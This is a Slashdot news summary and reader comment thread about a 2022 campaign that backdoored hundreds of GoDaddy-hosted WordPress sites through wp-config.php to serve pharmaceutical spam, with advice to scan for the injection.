Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
Security The Internet

Hundreds of GoDaddy-Hosted Sites Backdoored In a Single Day (bleepingcomputer.com) 19

Internet security analysts have spotted a spike in backdoor infections on WordPress websites hosted on GoDaddy's Managed WordPress service, all featuring an identical backdoor payload. The case affects internet service resellers such as MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress. BleepingComputer reports: The discovery comes from Wordfence, whose team first observed the malicious activity on March 11, 2022, with 298 websites infected by the backdoor within 24 hours, 281 of which were hosted on GoDaddy. The backdoor infecting all sites is a 2015 Google search SEO-poisoning tool implanted on the wp-config.php to fetch spam link templates from the C2 that are used to inject malicious pages into search results. The campaign uses predominately pharmaceutical spam templates, served to visitors of the compromised websites instead of the actual content.

The goal of these templates is likely to entice the victims to make purchases of fake products, losing money and payment details to the threat actors. Additionally, the actors can harm a website's reputation by altering its content and making the breach evident, but this doesn't seem to be the actors' aim at this time. The intrusion vector hasn't been determined, so while this looks suspiciously close to a supply chain attack, it hasn't been confirmed. [...] In any case, if your website is hosted on GoDaddy's Managed WordPress platform, make sure to scan your wp-config.php file to locate potential backdoor injections. Wordfence also reminds admins that while removing the backdoor should be the first step, removing spam search engine results should also be a priority.

This discussion has been archived. No new comments can be posted.

Hundreds of GoDaddy-Hosted Sites Backdoored In a Single Day

Comments Filter:
  • by joshuark ( 6549270 ) on Thursday March 17, 2022 @08:16PM (#62367711)

    Now it goes...from GoDaddy to "Whoa daddy!" with this development.

    JoshK.

  • Wordpress can be secure if you know what you're doing. Trust the professionals.

    Oh, wait!

  • by anonymouscoward52236 ( 6163996 ) on Thursday March 17, 2022 @08:21PM (#62367723)

    This wasn't a bug, it was a feature. GoDaddy sucks!

  • Now on pornhub!

    • Came here for this comment. Err, I mean I opened the thread hoping this would pop up. What I mean is, I hope they don’t have a hard time fixing the problem in the end.

      Never mind.

    • while wearing a t-shirt that says "backdoor guests are best"

  • They've mismanaged my domains in the past, and just this month stopped my email forwarding on my domain because of a "past due balance" of $0.00. Forwarding was restored when I paid them exactly $0.00. Of course I have to go through the checkout process first, and didn't even need to submit a card for payment. BTW, they didn't send an email to tell me about this, I just noticed I did not get an email I was expecting, and did a test send.

    Great customer service, NOT!
    (Apologies to Wayne Campbell. Party on!

  • None of the brands you named are resellers. They're wholly owned subsidiaries of GoDaddy.
  • Years ago, I made a website for someone. I coded it as I intended it to work, not like whatever weed the Wordpress developper wanted it to, and everyone's happy.

    Years later, I was just perusing through the code, and I see garbage in essentially every script.

    But the website was working perfectly well

    Upon digging, I found out the host was compromised, and every script in every single account was infected with some malware that would only "work" with Wordpress.

    Every malicious account got deleted. Mine

    • by King_TJ ( 85913 )

      Well ... if everyone started using YOUR custom coded solutions instead, the same thing would have happened eventually with your code. :)

      I mean, seriously though -- it should always give you more secure and efficient code when you write a purpose-built solution for a web site, vs using one of these frameworks like WordPress and customizing it to meet your needs.

      The problem is, that severely restricts people's ability to spin up a site they need without having the developer talent (or money to pay them to bui

  • "Go Daddy" and "Backdoor"

    Contents not what expected.

    Honestly, that's a relief.

  • Apparently I'm pulling my company out of GoDaddy just in time.

    After years of having to call up GoDaddy support once every 4 to 6 months because our website would suddenly "disappear" from the web, they abandoned the courtesy email accounts that were bundled with their hosting plans and forced their customers onto Microsoft 365 for email and calendaring. That adversely affected our business for several days and would eventually cost us a lot of money for something that, when we first opened our account, was

  • This exact attack occurred twice, early in 2020, and again 11/2020 on my personal Web site that has been around for over 20 years but which I only lately hosted on GoDaddy. Worse, my content is strictly old-school plain static HTML, and the hackery injected PHP scripts in various new files while leaving all my genuine content alone. So there is no reason for this injection to have worked, except that the GoDaddy server had activated a PHP feature which I never asked for or used.

    Worse still, the hack was

  • Aside from injecting some PHP code, why not make db changes as well? Surely a bit harder for most people to detect and especially clean up.
    Good time to leave GoDaddy for sure though - if they aren't keeping up with WordPress patching, they probably aren't doing too great with OS patching either.

"A mind is a terrible thing to have leaking out your ears." -- The League of Sadistic Telepaths

Working...